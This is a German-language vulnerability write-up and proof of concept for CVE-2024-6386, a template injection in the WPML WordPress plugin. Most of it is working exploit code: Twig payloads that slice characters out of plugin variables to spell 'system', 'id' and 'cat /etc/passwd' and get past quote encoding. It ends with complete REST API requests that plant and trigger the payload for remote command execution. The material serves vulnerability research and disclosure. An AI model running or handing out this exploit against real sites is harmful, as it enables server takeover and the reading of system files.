
Forschung und PoC für CVE-2024-6386
Detaillierte Forschung auf Russisch: CVE-2024-6386

Basisbewertung: 9.9
Vektor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
In WPML können Sie bestimmte WordPress Shortcodes verwenden, die es Ihnen ermöglichen, Makros zu erstellen und auch Twig-Vorlagen zu rendern. So können Sie leicht eine SSTI daraus erhalten.
Zum Beispiel erstellen wir einen Shortcode, um SSTI auszunutzen:
[wpml_language_switcher]
{{ 2*2 }}
[/wpml_language_switcher]
In diesem Fall erhalten wir 4 als Ergebnis der Darstellung unseres Shortcodes.
Aufgrund der Kodierung aller Arten von Anführungszeichen in HTML durch WordPress können wir keine typischen Payloads verwenden, wie zum Beispiel:
{{['id']|filter('system')}}
Trotzdem können wir diesen Payload modifizieren, um OS-Befehle aus Variablen-Buchstaben aufzurufen, wie: (s = 's').
Dazu müssen wir einige lokale Variablen aufrufen, wie:
css_classeslanguagesErstere gibt uns einen String zurück: wpml-ls-statics-shortcode_actions wpml-ls.
Zweite gibt ein Array-Objekt von Sprachen zurück.
Mit Hilfe davon können wir benötigte Symbole ausschneiden und unser eigenes Alphabet erstellen.
Also erstellen wir hier ein Alphabet: [<space> ,a, c, i, d, s, y, t, e, m, p, w ]
Und ja, wir sollten languages mit einem leeren Wert verketten, um daraus einen String mit dem Wert "Array" zu machen.
{% set sp = css_classes|slice(33,1) %}
{% set a = css_classes|slice(10,1) %}
{% set c = css_classes|slice(13,1) %}
{% set i = css_classes|slice(12,1) %}
{% set d = css_classes|slice(23,1) %}
{% set s = css_classes|slice(6,1) %}
{% set y = languages|join|slice(4,1) %}
{% set t = css_classes|slice(9,1) %}
{% set e = css_classes|slice(24,1) %}
{% set m = css_classes|slice(2,1) %}
{% set p = css_classes|slice(1,1) %}
{% set w = css_classes|slice(0,1) %}
Danach können wir unser Alphabet zu Payloads verketten:
{% set system = s~y~s~t~e~m %}
{% set pwd = p~w~d %}
{% set id = i~d %}
{% set cat = c~a~t %}
{% set sl = [pwd]|map(system)|join|slice(0,1) %}
{% set passwd = c~a~t~sp~sl~e~t~c~sl~p~a~s~s~w~d %}
{{[id]|map(system)|join}}
{{[pwd]|map(system)|join}}
{{[passwd]|map(system)|join}}
POST /wp-json/wp/v2/posts/30?_locale=user HTTP/1.1
Host: vulned.com
{
"id":30,
"content":"<!-- wp:shortcode -->\n[wpml_language_switcher]\n{% set sp = css_classes|slice(33,1) %}{% set a = css_classes|slice(10,1) %}{% set c = css_classes|slice(13,1) %}{% set i = css_classes|slice(12,1) %}{% set d = css_classes|slice(23,1) %}{% set s = css_classes|slice(6,1) %}{% set y = languages|join|slice(4,1) %}{% set t = css_classes|slice(9,1) %}{% set e = css_classes|slice(24,1) %}{% set m = css_classes|slice(2,1) %}{% set p = css_classes|slice(1,1) %}{% set w = css_classes|slice(0,1) %}{% set system = s~y~s~t~e~m %}{% set pwd = p~w~d %}{% set cat = c~a~t %}{% set sl = [pwd]|map(system)|join|slice(0,1) %}{% set id = i~d %}{% set passwd = c~a~t~sp~sl~e~t~c~sl~p~a~s~s~w~d %}{{[id]|map(system)|join}}\n[/wpml_language_switcher]<!-- /wp:shortcode -->"
}
GET /?p=30 HTTP/1.1
Host: vulned.com